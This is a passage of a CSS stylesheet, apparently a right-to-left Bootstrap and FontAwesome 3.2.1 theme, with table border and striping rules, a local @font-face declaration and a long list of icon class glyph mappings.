-webkit-border-top-right-radius: 4px; -moz-border-radius-topright: 4px; border-top-right-radius: 4px; } .table-bordered thead:first-child tr:first-child > th:last-child, .table-bordered tbody:first-child tr:first-child > td:last-child, .table-bordered tbody:first-child tr:first-child > th:last-child { -webkit-border-top-left-radius: 4px; -moz-border-radius-topleft: 4px; border-top-left-radius: 4px; } .table-bordered thead:last-child tr:last-child > th:first-child, .table-bordered tbody:last-child tr:last-child > td:first-child, .table-bordered tbody:last-child tr:last-child > th:first-child, .table-bordered tfoot:last-child tr:last-child > td:first-child, .table-bordered tfoot:last-child tr:last-child > th:first-child { -webkit-border-bottom-right-radius: 4px; -moz-border-radius-bottomright: 4px; border-bottom-right-radius: 4px; } .table-bordered thead:last-child tr:last-child > th:last-child, .table-bordered tbody:last-child tr:last-child > td:last-child, .table-bordered tbody:last-child tr:last-child > th:last-child, .table-bordered tfoot:last-child tr:last-child > td:last-child, .table-bordered tfoot:last-child tr:last-child > th:last-child { -webkit-border-bottom-left-radius: 4px; -moz-border-radius-bottomleft: 4px; border-bottom-left-radius: 4px; } .table-bordered tfoot + tbody:last-child tr:last-child td:first-child { -webkit-border-bottom-right-radius: 0; -moz-border-radius-bottomright: 0; border-bottom-right-radius: 0; } .table-bordered tfoot + tbody:last-child tr:last-child td:last-child { -webkit-border-bottom-left-radius: 0; -moz-border-radius-bottomleft: 0; border-bottom-left-radius: 0; } .table-bordered caption + thead tr:first-child th:first-child, .table-bordered caption + tbody tr:first-child td:first-child, .table-bordered colgroup + thead tr:first-child th:first-child, .table-bordered colgroup + tbody tr:first-child td:first-child { -webkit-border-top-right-radius: 4px; -moz-border-radius-topright: 4px; border-top-right-radius: 4px; } .table-bordered caption + thead tr:first-child th:last-child, .table-bordered caption + tbody tr:first-child td:last-child, .table-bordered colgroup + thead tr:first-child th:last-child, .table-bordered colgroup + tbody tr:first-child td:last-child { -webkit-border-top-left-radius: 4px; -moz-border-radius-topleft: 4px; border-top-left-radius: 4px; } .table-striped tbody > tr:nth-child(odd) > td, .table-striped tbody > tr:nth-child(odd) > th { background-color: #f9f9f9; } .table-hover tbody tr:hover > td, .table-hover tbody tr:hover > th { background-color: #f5f5f5; } table td[class*="span"], table th[class*="span"], .row-fluid table td[class*="span"], .row-fluid table th[class*="span"] { display: table-cell; float: none; margin-right: 0; } .table td.span1, .table th.span1 { float: none; width: 53px; margin-right: 0; } .table td.span2, .table th.span2 { float: none; width: 132px; margin-right: 0; } .table td.span3, .table th.span3 { float: none; width: 211px; margin-right: 0; } .table td.span4, .table th.span4 { float: none; width: 290px; margin-right: 0; } .table td.span5, .table th.span5 { float: none; width: 369px; margin-right: 0; } .table td.span6, .table th.span6 { float: none; width: 448px; margin-right: 0; } .table td.span7, .table th.span7 { float: none; width: 527px; margin-right: 0; } .table td.span8, .table th.span8 { float: none; width: 606px; margin-right: 0; } .table td.span9, .table th.span9 { float: none; width: 685px; margin-right: 0; } .table td.span10, .table th.span10 { float: none; width: 764px; margin-right: 0; } .table td.span11, .table th.span11 { float: none; width: 843px; margin-right: 0; } .table td.span12, .table th.span12 { float: none; width: 922px; margin-right: 0; } .table tbody tr.success > td { background-color: #dff0d8; } .table tbody tr.error > td { background-color: #f2dede; } .table tbody tr.warning > td { background-color: #fcf8e3; } .table tbody tr.info > td { background-color: #d9edf7; } .table-hover tbody tr.success:hover > td { background-color: #d0e9c6; } .table-hover tbody tr.error:hover > td { background-color: #ebcccc; } .table-hover tbody tr.warning:hover > td { background-color: #faf2cc; } .table-hover tbody tr.info:hover > td { background-color: #c4e3f3; } @font-face { font-family: 'FontAwesome'; src: url('../../../fonts/font-awesome/font/fontawesome-webfont.eot?v=3.2.1'); src: url('../../../fonts/font-awesome/font/fontawesome-webfont.eot?#iefix&v=3.2.1') format('embedded-opentype'), url('../../../fonts/font-awesome/font/fontawesome-webfont.woff?v=3.2.1') format('woff'), url('../../../fonts/font-awesome/font/fontawesome-webfont.ttf?v=3.2.1') format('truetype'), url('../../../fonts/font-awesome/font/fontawesome-webfont.svg#fontawesomeregular?v=3.2.1') format('svg'); font-weight: normal; font-style: normal; } [class^="icon-"], [class*=" icon-"] { font-family: FontAwesome; font-weight: normal; font-style: normal; text-decoration: inherit; -webkit-font-smoothing: antialiased; *margin-left: .3em; } [class^="icon-"]:before, [class*=" icon-"]:before { text-decoration: inherit; display: inline-block; speak: none; } .icon-large:before { vertical-align: -10%; font-size: 1.3333333333333em; } a [class^="icon-"], a [class*=" icon-"] { display: inline; } [class^="icon-"].icon-fixed-width, [class*=" icon-"].icon-fixed-width { display: inline-block; width: 1.1428571428571em; text-align: left; padding-left: 0.28571428571429em; } [class^="icon-"].icon-fixed-width.icon-large, [class*=" icon-"].icon-fixed-width.icon-large { width: 1.4285714285714em; } .icons-ul { margin-right: 2.1428571428571em; list-style-type: none; } .icons-ul > li { position: relative; } .icons-ul .icon-li { position: absolute; right: -2.1428571428571em; width: 2.1428571428571em; text-align: center; line-height: inherit; } [class^="icon-"].hide, [class*=" icon-"].hide { display: none; } .icon-muted { color: #eee; } .icon-light { color: #fff; } .icon-dark { color: #333; } .icon-border { border: solid 1px #eee; padding: .2em .25em .15em; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .icon-2x { font-size: 2em; } .icon-2x.icon-border { border-width: 2px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .icon-3x { font-size: 3em; } .icon-3x.icon-border { border-width: 3px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } .icon-4x { font-size: 4em; } .icon-4x.icon-border { border-width: 4px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .icon-5x { font-size: 5em; } .icon-5x.icon-border { border-width: 5px; -webkit-border-radius: 7px; -moz-border-radius: 7px; border-radius: 7px; -webkit-border-radius: 7px; -moz-border-radius: 7px; border-radius: 7px; } .pull-right { float: left; } .pull-left { float: right; } [class^="icon-"].pull-left, [class*=" icon-"].pull-left { margin-left: .3em; } [class^="icon-"].pull-right, [class*=" icon-"].pull-right { margin-right: .3em; } [class^="icon-"], [class*=" icon-"] { display: inline; width: auto; height: auto; line-height: normal; vertical-align: baseline; background-image: none; background-position: 100% 0%; background-repeat: repeat; margin-top: 0; } .icon-white, .nav-pills > .active > a > [class^="icon-"], .nav-pills > .active > a > [class*=" icon-"], .nav-list > .active > a > [class^="icon-"], .nav-list > .active > a > [class*=" icon-"], .navbar-inverse .nav > .active > a > [class^="icon-"], .navbar-inverse .nav > .active > a > [class*=" icon-"], .dropdown-menu > li > a:hover > [class^="icon-"], .dropdown-menu > li > a:hover > [class*=" icon-"], .dropdown-menu > .active > a > [class^="icon-"], .dropdown-menu > .active > a > [class*=" icon-"], .dropdown-submenu:hover > a > [class^="icon-"], .dropdown-submenu:hover > a > [class*=" icon-"] { background-image: none; } .btn [class^="icon-"].icon-large, .btn [class*=" icon-"].icon-large, .nav [class^="icon-"].icon-large, .nav [class*=" icon-"].icon-large { line-height: .9em; } .btn [class^="icon-"].icon-spin, .btn [class*=" icon-"].icon-spin, .nav [class^="icon-"].icon-spin, .nav [class*=" icon-"].icon-spin { display: inline-block; } .nav-tabs [class^="icon-"], .nav-tabs [class^="icon-"].icon-large, .nav-tabs [class*=" icon-"], .nav-tabs [class*=" icon-"].icon-large, .nav-pills [class^="icon-"], .nav-pills [class^="icon-"].icon-large, .nav-pills [class*=" icon-"], .nav-pills [class*=" icon-"].icon-large { line-height: .9em; } .btn [class^="icon-"].pull-left.icon-2x, .btn [class^="icon-"].pull-right.icon-2x, .btn [class*=" icon-"].pull-left.icon-2x, .btn [class*=" icon-"].pull-right.icon-2x { margin-top: .18em; } .btn [class^="icon-"].icon-spin.icon-large, .btn [class*=" icon-"].icon-spin.icon-large { line-height: .8em; } .btn.btn-small [class^="icon-"].pull-left.icon-2x, .btn.btn-small [class^="icon-"].pull-right.icon-2x, .btn.btn-small [class*=" icon-"].pull-left.icon-2x, .btn.btn-small [class*=" icon-"].pull-right.icon-2x { margin-top: .25em; } .btn.btn-large [class^="icon-"], .btn.btn-large [class*=" icon-"] { margin-top: 0; } .btn.btn-large [class^="icon-"].pull-left.icon-2x, .btn.btn-large [class^="icon-"].pull-right.icon-2x, .btn.btn-large [class*=" icon-"].pull-left.icon-2x, .btn.btn-large [class*=" icon-"].pull-right.icon-2x { margin-top: .05em; } .btn.btn-large [class^="icon-"].pull-left.icon-2x, .btn.btn-large [class*=" icon-"].pull-left.icon-2x { margin-left: .2em; } .btn.btn-large [class^="icon-"].pull-right.icon-2x, .btn.btn-large [class*=" icon-"].pull-right.icon-2x { margin-right: .2em; } .nav-list [class^="icon-"], .nav-list [class*=" icon-"] { line-height: inherit; } .icon-stack { position: relative; display: inline-block; width: 2em; height: 2em; line-height: 2em; vertical-align: -35%; } .icon-stack [class^="icon-"], .icon-stack [class*=" icon-"] { display: block; text-align: center; position: absolute; width: 100%; height: 100%; font-size: 1em; line-height: inherit; *line-height: 2em; } .icon-stack .icon-stack-base { font-size: 2em; *line-height: 1em; } .icon-spin { display: inline-block; -moz-animation: spin 2s infinite linear; -o-animation: spin 2s infinite linear; -webkit-animation: spin 2s infinite linear; animation: spin 2s infinite linear; } a .icon-stack, a .icon-spin { display: inline-block; text-decoration: none; } @-moz-keyframes spin { 0% { -moz-transform: rotate(0deg); } 100% { -moz-transform: rotate(359deg); } } @-webkit-keyframes spin { 0% { -webkit-transform: rotate(0deg); } 100% { -webkit-transform: rotate(359deg); } } @-o-keyframes spin { 0% { -o-transform: rotate(0deg); } 100% { -o-transform: rotate(359deg); } } @-ms-keyframes spin { 0% { -ms-transform: rotate(0deg); } 100% { -ms-transform: rotate(359deg); } } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(359deg); } } .icon-rotate-90:before { -webkit-transform: rotate(90deg); -moz-transform: rotate(90deg); -ms-transform: rotate(90deg); -o-transform: rotate(90deg); transform: rotate(90deg); filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=1); } .icon-rotate-180:before { -webkit-transform: rotate(180deg); -moz-transform: rotate(180deg); -ms-transform: rotate(180deg); -o-transform: rotate(180deg); transform: rotate(180deg); filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2); } .icon-rotate-270:before { -webkit-transform: rotate(270deg); -moz-transform: rotate(270deg); -ms-transform: rotate(270deg); -o-transform: rotate(270deg); transform: rotate(270deg); filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=3); } .icon-flip-horizontal:before { -webkit-transform: scale(-1,1); -moz-transform: scale(-1,1); -ms-transform: scale(-1,1); -o-transform: scale(-1,1); transform: scale(-1,1); } .icon-flip-vertical:before { -webkit-transform: scale(1,-1); -moz-transform: scale(1,-1); -ms-transform: scale(1,-1); -o-transform: scale(1,-1); transform: scale(1,-1); } a .icon-rotate-90:before, a .icon-rotate-180:before, a .icon-rotate-270:before, a .icon-flip-horizontal:before, a .icon-flip-vertical:before { display: inline-block; } .icon-glass:before { content: "\f000"; } .icon-music:before { content: "\f001"; } .icon-search:before { content: "\f002"; } .icon-envelope-alt:before { content: "\f003"; } .icon-heart:before { content: "\f004"; } .icon-star:before { content: "\f005"; } .icon-star-empty:before { content: "\f006"; } .icon-user:before { content: "\f007"; } .icon-film:before { content: "\f008"; } .icon-th-large:before { content: "\f009"; } .icon-th:before { content: "\f00a"; } .icon-th-list:before { content: "\f00b"; } .icon-ok:before { content: "\f00c"; } .icon-remove:before { content: "\f00d"; } .icon-zoom-in:before { content: "\f00e"; } .icon-zoom-out:before { content: "\f010"; } .icon-power-off:before, .icon-off:before { content: "\f011"; } .icon-signal:before { content: "\f012"; } .icon-gear:before, .icon-cog:before { content: "\f013"; } .icon-trash:before { content: "\f014"; } .icon-home:before { content: "\f015"; } .icon-file-alt:before { content: "\f016"; } .icon-time:before { content: "\f017"; } .icon-road:before { content: "\f018"; } .icon-download-alt:before { content: "\f019"; } .icon-download:before { content: "\f01a"; } .icon-upload:before { content: "\f01b"; } .icon-inbox:before { content: "\f01c"; } .icon-play-circle:before { content: "\f01d"; } .icon-rotate-right:before, .icon-repeat:before { content: "\f01e"; } .icon-refresh:before { content: "\f021"; } .icon-list-alt:before { content: "\f022"; } .icon-lock:before { content: "\f023"; } .icon-flag:before { content: "\f024"; } .icon-headphones:before { content: "\f025"; } .icon-volume-off:before { content: "\f026"; } .icon-volume-down:before { content: "\f027"; } .icon-volume-up:before { content: "\f028"; } .icon-qrcode:before { content: "\f029"; } .icon-barcode:before { content: "\f02a"; } .icon-tag:before { content: "\f02b"; } .icon-tags:before { content: "\f02c"; } .icon-book:before { content: "\f02d"; } .icon-bookmark:before { content: "\f02e"; } .icon-print:before { content: "\f02f"; } .icon-camera:before { content: "\f030"; } .icon-font:before { content: "\f031"; } .icon-bold:before { content: "\f032"; } .icon-italic:before { content: "\f033"; } .icon-text-height:before { content: "\f034"; } .icon-text-width:before { content: "\f035"; } .icon-align-left:before { content: "\f036"; } .icon-align-center:before { content: "\f037"; } .icon-align-right:before { content: "\f038"; } .icon-align-justify:before { content: "\f039"; } .icon-list:before { content: "\f03a"; } .icon-indent-left:before { content: "\f03b"; } .icon-indent-right:before { content: "\f03c"; } .icon-facetime-video:before { content: "\f03d"; } .icon-picture:before { content: "\f03e"; } .icon-pencil:before { content: "\f040"; } .icon-map-marker:before { content: "\f041"; } .icon-adjust:before { content: "\f042"; } .icon-tint:before { content: "\f043"; } .icon-edit:before { content: "\f044"; } .icon-share:before { content: "\f045"; } .icon-check:before { content: "\f046"; } .icon-move:before { content: "\f047"; } .icon-step-backward:before { content: "\f048"; } .icon-fast-backward:before { content: "\f049"; } .icon-backward:before { content: "\f04a"; } .icon-play:before { content: "\f04b"; } .icon-pause:before { content: "\f04c"; } .icon-stop:before { content: "\f04d"; } .icon-forward:before { content: "\f04e"; } .icon-fast-forward:before { content: "\f050"; } .icon-step-forward:before { content: "\f051"; } .icon-eject:before { content: "\f052"; } .icon-chevron-left:before { content: "\f053"; } .icon-chevron-right:before { content: "\f054"; } .icon-plus-sign:before { content: "\f055"; } .icon-minus-sign:before { content: "\f056"; } .icon-remove-sign:before { content: "\f057"; } .icon-ok-sign:before { content: "\f058"; } .icon-question-sign:before { content: "\f059"; } .icon-info-sign:before { content: "\f05a"; } .icon-screenshot:before { content: "\f05b"; } .icon-remove-circle:before { content: "\f05c"; } .icon-ok-circle:before { content: "\f05d"; } .icon-ban-circle:before { content: "\f05e"; } .icon-arrow-left:before { content: "\f060"; } .icon-arrow-right:before { content: "\f061"; } .icon-arrow-up:before { content: "\f062"; } .icon-arrow-down:before { content: "\f063"; } .icon-mail-forward:before, .icon-share-alt:before { content: "\f064"; } .icon-resize-full:before { content: "\f065"; } .icon-resize-small:before { content: "\f066"; } .icon-plus:before { content: "\f067"; } .icon-minus:before { content: "\f068"; } .icon-asterisk:before { content: "\f069"; } .icon-exclamation-sign:before { content: "\f06a"; } .icon-gift:before { content: "\f06b"; } .icon-leaf:before { content: "\f06c"; } .icon-fire:before { content: "\f06d"; } .icon-eye-open:before { content: "\f06e"; } .icon-eye-close:before { content: "\f070"; } .icon-warning-sign:before { content: "\f071"; } .icon-plane:before { content: "\f072"; } .icon-calendar:before { content: "\f073"; } .icon-random:before { content: "\f074"; } .icon-comment:before { content: "\f075"; } .icon-magnet:before { content: "\f076"; } .icon-chevron-up:before { content: "\f077"; } .icon-chevron-down:before { content: "\f078"; } .icon-retweet:before { content: "\f079"; } .icon-shopping-cart:before { content: "\f07a"; } .icon-folder-close:before { content: "\f07b"; } .icon-folder-open:before { content: "\f07c"; } .icon-resize-vertical:before { content: "\f07d"; } .icon-resize-horizontal:before { content: "\f07e"; } .icon-bar-chart:before { content: "\f080"; } .icon-twitter-sign:before { content: "\f081"; } .icon-facebook-sign:before { content: "\f082"; } .icon-camera-retro:before { content: "\f083"; } .icon-key:before { content: "\f084"; } .icon-gears:before, .icon-cogs:before { content: "\f085"; } .icon-comments:before { content: "\f086"; } .icon-thumbs-up-alt:before { content: "\f087"; } .icon-thumbs-down-alt:before { content: "\f088"; } .icon-star-half:before { content: "\f089"; } .icon-heart-empty:before { content: "\f08a"; } .icon-signout:before { content: "\f08b"; } .icon-linkedin-sign:before { content: "\f08c"; } .icon-pushpin:before { content: "\f08d"; } .icon-external-link:before { content: "\f08e"; } .icon-signin:before { content: "\f090"; } .icon-trophy:before { content: "\f091"; } .icon-github-sign:before { content: "\f092"; } .icon-upload-alt:before { content: "\f093"; } .icon-lemon:before { content: "\f094"; } .icon-phone:before { content: "\f095"; } .icon-unchecked:before, .icon-check-empty:before { content: "\f096"; } .icon-bookmark-empty:before { content: "\f097"; } .icon-phone-sign:before { content: "\f098"; } .icon-twitter:before { content: "\f099"; } .icon-facebook:before { content: "\f09a"; } .icon-github:before { content: "\f09b"; } .icon-unlock:before { content: "\f09c"; } .icon-credit-card:before { content: "\f09d"; } .icon-rss:before { content: "\f09e"; } .icon-hdd:before { content: "\f0a0"; } .icon-bullhorn:before { content: "\f0a1"; } .icon-bell:before { content: "\f0a2"; } .icon-certificate:before { content: "\f0a3"; } .icon-hand-right:before { content: "\f0a4"; } .icon-hand-left:before { content: "\f0a5"; } .icon-hand-up:before { content: "\f0a6"; } .icon-hand-down:before { content: "\f0a7"; } .icon-circle-arrow-left:before { content: "\f0a8"; } .icon-circle-arrow-right:before { content: "\f0a9"; } .icon-circle-arrow-up:before { content: "\f0aa"; } .icon-circle-arrow-down:before { content: "\f0ab"; } .icon-globe:before { content: "\f0ac"; } .icon-wrench:before { content: "\f0ad"; } .icon-tasks:before { content: "\f0ae"; } .icon-filter:before { content: "\f0b0"; } .icon-briefcase:before { content: "\f0b1"; } .icon-fullscreen:before { content: "\f0b2"; } .icon-group:before { content: "\f0c0"; } .icon-link:before { content: "\f0c1"; } .icon-cloud:before { content: "\f0c2"; } .icon-beaker:before { content: "\f0c3"; } .icon-cut:before { content: "\f0c4"; } .icon-copy:before { content: "\f0c5"; } .icon-paperclip:before, .icon-paper-clip:before { content: "\f0c6"; } .icon-save:before { content: "\f0c7"; } .icon-sign-blank:before { content: "\f0c8"; } .icon-reorder:before { content: "\f0c9"; } .icon-list-ul:before { content: "\f0ca"; } .icon-list-ol:before { content: "\f0cb"; } .icon-strikethrough:before { content: "\f0cc"; } .icon-underline:before { content: "\f0cd"; } .icon-table:before { content: "\f0ce"; } .icon-magic:before { content: "\f0d0"; } .icon-truck:before { content: "\f0d1"; } .icon-pinterest:before { content: "\f0d2"; } .icon-pinterest-sign:before { content: "\f0d3"; } .icon-google-plus-sign:before { content: "\f0d4"; } .icon-google-plus:before { content: "\f0d5"; } .icon-money:before { content: "\f0d6"; } .icon-caret-down:before { content: "\f0d7"; } .icon-caret-up:before { content: "\f0d8"; } .icon-caret-left:before { content: "\f0d9"; } .icon-caret-right:before { content: "\f0da"; } .icon-columns:before { content: "\f0db"; } .icon-sort:before { content: "\f0dc"; } .icon-sort-down:before { content: "\f0dd"; } .icon-sort-up:before { content: "\f0de"; } .icon-envelope:before { content: "\f0e0"; } .icon-linkedin:before { content: "\f0e1"; } .icon-rotate-left:before, .icon-undo:before { content: "\f0e2"; } .icon-legal:before { content: "\f0e3"; } .icon-dashboard:before { content: "\f0e4"; } .icon-comment-alt:before { content: "\f0e5"; } .icon-comments-alt:before { content: "\f0e6"; } .icon-bolt:before { content: "\f0e7"; } .icon-sitemap:before { content: "\f0e8"; } .icon-umbrella:before { content: "\f0e9"; } .icon-paste:before { content: "\f0ea"; } .icon-lightbulb:before { content: "\f0eb"; } .icon-exchange:before { content: "\f0ec"; } .icon-cloud-download:before { content: "\f0ed"; } .icon-cloud-upload:before { content: "\f0ee"; } .icon-user-md:before { content: "\f0f0"; } .icon-stethoscope:before { content: "\f0f1"; } .icon-suitcase:before { content: "\f0f2"; } .icon-bell-alt:before { content: "\f0f3"; } .icon-coffee:before { content: "\f0f4"; } .icon-food:before { content: "\f0f5"; } .icon-file-text-alt:before { content: "\f0f6"; } .icon-building:before { content: "\f0f7"; } .icon-hospital:before { content: "\f0f8"; } .icon-ambulance:before { content: "\f0f9"; } .icon-medkit:before { content: "\f0fa"; } .icon-fighter-jet:before { content: "\f0fb"; } .icon-beer:before { content: "\f0fc"; } .icon-h-sign:before { content: "\f0fd"; } .icon-plus-sign-alt:before { content: "\f0fe"; } .icon-double-angle-left:before { content: "\f100"; } .icon-double-angle-right:before { content: "\f101"; } .icon-double-angle-up:before { content: "\f102"; } .icon-double-angle-down:before { content: "\f103"; } .icon-angle-left:before { content: "\f104"; } .icon-angle-right:before { content: "\f105"; } .icon-angle-up:before { content: "\f106"; } .icon-angle-down:before { content: "\f107"; } .icon-desktop:before { content: "\f108"; } .icon-laptop:before { content: "\f109"; } .icon-tablet:before { content: "\f10a"; } .icon-mobile-phone:before { content: "\f10b"; } .icon-circle-blank:before { content: "\f10c"; } .icon-quote-left:before { content: "\f10d"; } .icon-quote-right:before { content: "\f10e"; } .icon-spinner:before { content: "\f110"; } .icon-circle:before { content: "\f111"; } .icon-mail-reply:before, .icon-reply:before { content: "\f112"; } .icon-github-alt:before { content: "\f113"; } .icon-folder-close-alt:before { content: "\f114"; } .icon-folder-open-alt:before { content: "\f115"; } .icon-expand-alt:before { content: "\f116"; } .icon-collapse-alt:before { content: "\f117"; } .icon-smile:before { content: "\f118"; } .icon-frown:before { content: "\f119"; } .icon-meh:before { content: "\f11a"; } .icon-gamepad:before { content: "\f11b"; } .icon-keyboard:before { content: "\f11c"; } .icon-flag-alt:before { content: "\f11d"; } .icon-flag-checkered:before { content: "\f11e"; } .icon-terminal:before { content: "\f120"; } .icon-code:before { content: "\f121"; } .icon-reply-all:before { content: "\f122"; } .icon-mail-reply-all:before { content: "\f122"; } .icon-star-half-full:before, .icon-star-half-empty:before { content: "\f123"; } .icon-location-arrow:before { content: "\f124"; } .icon-crop:before { content: "\f125"; } .icon-code-fork:before { content: "\f126"; } .icon-unlink:before { content: "\f127"; } .icon-question:before { content: "\f128"; } .icon-info:before { content: "\f129"; } .icon-exclamation:before { content: "\f12a"; } .icon-superscript:before { content: "\f12b"; } .icon-subscript:before { content: "\f12c"; } .icon-eraser:before { content: "\f12d"; } .icon-puzzle-piece:before { content: "\f12e"; } .icon-microphone:before { content: "\f130"; } .icon-microphone-off:before { content: "\f131"; } .icon-shield:before { content: "\f132"; } .icon-calendar-empty:before { content: "\f133"; } .icon-fire-extinguisher:before { content: "\f134"; } .icon-rocket:before { content: "\f135"; } .icon-maxcdn:before { content: "\f136"; } .icon-chevron-sign-left:before { content: "\f137"; } .icon-chevron-sign-right:before { content: "\f138"; } .icon-chevron-sign-up:before { content: "\f139"; } .icon-chevron-sign-down:before { content: "\f13a"; } .icon-html5:before { content: "\f13b"; } .icon-css3:before { content: "\f13c"; } .icon-anchor:before { content: "\f13d"; } .icon-unlock-alt:before { content: "\f13e"; } .icon-bullseye:before { content: "\f140"; } .icon-ellipsis-horizontal:before { content: "\f141"; } .icon-ellipsis-vertical:before { content: "\f142"; } .icon-rss-sign:before { content: "\f143"; } .icon-play-sign:before { content: "\f144"; } .icon-ticket:before { content: "\f145"; } .icon-minus-sign-alt:before { content: "\f146"; } .icon-check-minus:before { content: "\f147"; } .icon-level-up:before { content: "\f148"; } .icon-level-down:before { content: "\f149"; } .icon-check-sign:before { content: "\f14a"; } .icon-edit-sign:before { content: "\f14b"; } .icon-external-link-sign:before { content: "\f14c"; } .icon-share-sign:before { content: "\f14d"; } .icon-compass:before { content: "\f14e"; } .icon-collapse:before { content: "\f150"; } .icon-collapse-top:before { content: "\f151"; } .icon-expand:before { content: "\f152"; } .icon-euro:before, .icon-eur:before { content: "\f153"; } .icon-gbp:before { content: "\f154"; } .icon-dollar:before, .icon-usd:before { content: "\f155"; } .icon-rupee:before, .icon-inr:before { content: "\f156"; } .icon-yen:before, .icon-jpy:before { content: "\f157"; } .icon-renminbi:before, .icon-cny:before { content: "\f158"; } .icon-won:before, .icon-krw:before { content: "\f159"; } .icon-bitcoin:before, .icon-btc:before { content: "\f15a"; } .icon-file:before { content: "\f15b"; } .icon-file-text:before { content: "\f15c"; } .icon-sort-by-alphabet:before { content: "\f15d"; } .icon-sort-by-alphabet-alt:before { content: "\f15e"; } .icon-sort-by-attributes:before { content: "\f160"; } .icon-sort-by-attributes-alt:before { content: "\f161"; } .icon-sort-by-order:before { content: "\f162"; } .icon-sort-by-order-alt:before { content: "\f163"; } .icon-thumbs-up:before { content: "\f164"; } .icon-thumbs-down:before { content: "\f165"; } .icon-youtube-sign:before { content: "\f166"; } .icon-youtube:before { content: "\f167"; } .icon-xing:before { content: "\f168"; } .icon-xing-sign:before { content: "\f169"; } .icon-youtube-play:before { content: "\f16a"; } .icon-dropbox:before { content: "\f16b"; } .icon-stackexchange:before { content: "\f16c"; } .icon-instagram:before { content: "\f16d"; } .icon-flickr:before { content: "\f16e"; } .icon-adn:before { content: "\f170"; } .icon-bitbucket:before { content: "\f171"; } .icon-bitbucket-sign:before { content: "\f172"; } .icon-tumblr:before { content: "\f173"; } .icon-tumblr-sign:before { content: "\f174"; } .icon-long-arrow-down:before { content: "\f175"; } .icon-long-arrow-up:before { content: "\f176"; } .icon-long-arrow-left:before { content: "\f177"; } .icon-long-arrow-right:before { content: "\f178"; } .icon-apple:before { content: "\f179"; } .icon-windows:before { content: "\f17a"; } .icon-android:before { content: "\f17b"; } .icon-linux:before { content: "\f17c"; } .icon-dribbble:before { content: "\f17d"; } .icon-skype:before { content: "\f17e"; } .icon-foursquare:before { content: "\f180"; } .icon-trello:before { content: "\f181"; } .icon-female:before { content: "\f182"; } .icon-male:before { content: "\f183"; } .icon-gittip:before { content: "\f184"; } .icon-sun:before { content: "\f185"; } .icon-moon:before { content: "\f186"; } .icon-archive:before { content: "\f187"; } .icon-bug:before { content: "\f188"; } .icon-vk:before { content: "\f189"; } .icon-weibo:before { content: "\f18a"; } .icon-renren:before { content: "\f18b"; } .icon-address:before { content: "\f02d"; } .icon-arrow-down-2:before { content: "\f0ab"; } .icon-arrow-down-3:before { content: "\f0d7"; } .icon-arrow-first:before { content: "\f048"; } .icon-arrow-last:before { content: "\f051"; } .icon-arrow-left-2:before { content: "\f0a8"; } .icon-arrow-left-3:before { content: "\f0d9"; } .icon-arrow-right-2:before { content: "\f0a9"; } .icon-arrow-right-3:before { content: "\f0da"; } .icon-arrow-up-2:before { content: "\f0aa"; } .icon-arrow-up-3:before { content: "\f0d8"; } .icon-bars:before { content: "\f080"; } .icon-basket:before { content: "\f07a"; } .icon-box-add:before { content: "\f019"; } .icon-box-remove:before { content: "\f093"; } .icon-broadcast:before { content: "\f012"; } .icon-brush:before { content: "\f043"; } .icon-calendar-2:before { content: "\f073"; } .icon-camera-2:before { content: "\f03d"; } .icon-cancel:before { content: "\f057"; } .icon-cancel-2:before { content: "\f00d"; } .icon-cart:before { content: "\f07a"; } .icon-chart:before { content: "\f080"; } .icon-checkbox:before { content: "\f046"; } .icon-checkbox-partial:before { content: "\f147"; } .icon-checkbox-unchecked:before { content: "\f096"; } .icon-checkmark:before { content: "\f00c"; } .icon-clock:before { content: "\f017"; } .icon-color-palette:before { content: "\f0e4"; } .icon-comments-2:before { content: "\f086"; } .icon-contract:before { content: "\f066"; } .icon-contract-2:before { content: "\f066"; } .icon-cube:before { content: "\f01c"; } .icon-database:before { content: "\f0a0"; } .icon-drawer:before { content: "\f01c"; } .icon-drawer-2:before { content: "\f01c"; } .icon-expand:before { content: "\f065"; } .icon-expand-2:before { content: "\f0b2"; } .icon-eye:before { content: "\f06e"; } .icon-feed:before { content: "\f143"; } .icon-file-add:before { content: "\f116"; } .icon-file-remove:before { content: "\f117"; } .icon-first:before { content: "\f049"; } .icon-flag-2:before { content: "\f0c6"; } .icon-folder:before { content: "\f07c"; } .icon-folder-2:before { content: "\f07b"; } .icon-grid-view:before { content: "\f0db"; } .icon-grid-view-2:before { content: "\f00a"; } .icon-health:before { content: "\f0f1"; } .icon-help:before { content: "\f059"; } .icon-lamp:before { content: "\f0eb"; } .icon-last:before { content: "\f050"; } .icon-lightning:before { content: "\f0e7"; } .icon-list-view:before { content: "\f0ca"; } .icon-location:before { content: "\f041"; } .icon-locked:before { content: "\f023"; } .icon-loop:before { content: "\f021"; } .icon-mail:before { content: "\f0e0"; } .icon-mail-2:before { content: "\f003"; } .icon-menu:before { content: "\f142"; } .icon-menu-2:before { content: "\f0dc"; } .icon-minus-2:before { content: "\f068"; } .icon-mobile:before { content: "\f10b"; } .icon-next:before { content: "\f04e"; } .icon-out:before { content: "\f045"; } .icon-out-2:before { content: "\f08b"; } .icon-pencil-2:before { content: "\f040"; } .icon-pictures:before { content: "\f03e"; } .icon-pin:before { content: "\f08d"; } .icon-play-2:before { content: "\f01d"; } .icon-plus-2:before { content: "\f067"; } .icon-power-cord:before { content: "\f076"; } .icon-previous:before { content: "\f04a"; } .icon-printer:before { content: "\f02f"; } .icon-puzzle:before { content: "\f12e"; } .icon-quote:before { content: "\f10d"; } .icon-quote-2:before { content: "\f10e"; } .icon-redo:before { content: "\f064"; } .icon-screen:before { content: "\f108"; } .icon-shuffle:before { content: "\f074"; } .icon-star-2:before { content: "\f123"; } .icon-support:before { content: "\f05b"; } .icon-tools:before { content: "\f0ad"; } .icon-users:before { content: "\f0c0"; } .icon-vcard:before { content: "\f18b"; } .icon-wand:before { content: "\f0d0"; } .icon-warning:before { content: "\f071"; } .dropup, 